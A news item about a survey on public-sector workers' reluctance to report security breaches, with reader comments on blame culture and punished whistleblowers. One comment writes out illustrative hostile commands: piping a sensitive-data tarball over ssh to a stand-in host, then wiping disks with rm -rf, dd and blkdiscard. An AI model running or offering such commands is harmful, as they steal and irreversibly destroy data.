Survey: 2/3 of Public Sector Workers Wouldn't Report a Security Breach
An anonymous reader sends news of a survey of workers in the public sector conducted by Daisy Group, a British IT firm, which found that 64% of them would stay quiet about a security breach they noticed. The survey also found that 5% of workers admitted to disabling the password protection features on their work devices, and 20% said they don't update their passwords regularly. Daisy Group's Graham Harris said, "When it comes to data security, all too often organisations focus purely on IT processes and forget about the staff that will be using them. Human error is one of, if not the most likely source for data security issues, and fear of reprisal is a powerful force." 16% of respondents said they didn't know if data protection was an important part of their company's security practices.
Being fired is extreme, but in at least two companies I worked for, there was a strong "you broke it, you bought it" mentality to this sort of thing. If you found a security issue, you were expected to move across the corporation until it got fixed. Derailing your actual job, your personal life, and just about any hope of happiness until it got fixed. Of course you don't report it.
The issue frequently is that IT is seen as the cost center to reduce most, so getting someone in IT to a) acknowledge it is an issue not user error/invalid use case requires champion effort, b) the IT guys that exist are marginally competent, the good ones are too expensive to work here full time, c) frequently users are told how dumb they are, so they aren't even sure if they've found an issue or "I must be doing something wrong", d) how did you find it in the first place? Were you doing something you shouldn't? HMMM?
Posting AC on this just because this is a common topic:
Updating passwords is a quick band-aid, mainly to show that after a breach, -something- is done. So, the first thing done is that the Windows admin runs:
dsquery user | dsmod user -mustchpwd yes
and the place says they have "taken proper security precautions".
As for reporting security breaches, here in the US, one is bred from birth (if they are born in the 1990s or later) to "sit down, shut up, and stop snitchin'". A good example of what happens if one reports security holes is what happened to my GF's son, who was in high school at the time. He had a classmate who found a security issue with the school's website and reported it. Well, he got arrested on the spot at the principal's office for a CFAA violation and expelled. Not for -using- the breach, but just -mentioning- it. The CFAA charge didn't stick (since he didn't use the exploit), but the expulsion did [1].
This carries to the work world. I worked at one job where we were told to challenge people who were tailgating. One day, I was going in the building, had someone following me close behind. I refused to open the door and called security because the guy didn't have a badge, and refused to show ID. Well, he turned out to be some muckety muck with a high office, and I ended up getting handed my walking papers that day because "I didn't play well with senior company officials", even though policy was to disallow tailgating.
So, it is no wonder why people are not going to go out of their way to report security related items. If one is in school, they get threatened with expulsion and arrest. In the work world, it is blacklisting, arrest, and loss of a job.
The lack of resources put into security and the prompt punishing of people who "see something, say something" is part of why China is assraping us so hard when it comes to security. If someone mentions -anything- out of the ordinary, they get the Richard Jewell treatment, so in the school and work environment, it is just keep the head down and shut up.
What can you do? I'm lucky to work at a place where they are responsive to security, but in most places, one might have to resort to anonymous tips to the FBI and other LEOs about the breach in order for anything to get done.
I wonder what will happen long term when security breaches don't just constitute a "tar /home/SensitiveDataStash/* | ssh foo.com 'cat - > foo.tar'", but following the offsite copy, a "rm -rf /home", followed by a "dd if=/dev/zero of=/dev/sda" if the drive is an array, HDD, or LUN, or a "blkdiscard /dev/hda" if an SSD. Right now, companies don't give a rat's ass if they get broken into and data snarfed... but once the bad guys start destroying data, people will care. However, with the fact that any employees who might mention a security issue would get shitcanned, it is going to take a big company going out of business for security policies to actually be enacted that make sense. It may even take major loss of life.
[1]: Irony is that the kid got his GED and his high school equivalency, and is doing far better than he would had he graduated HS.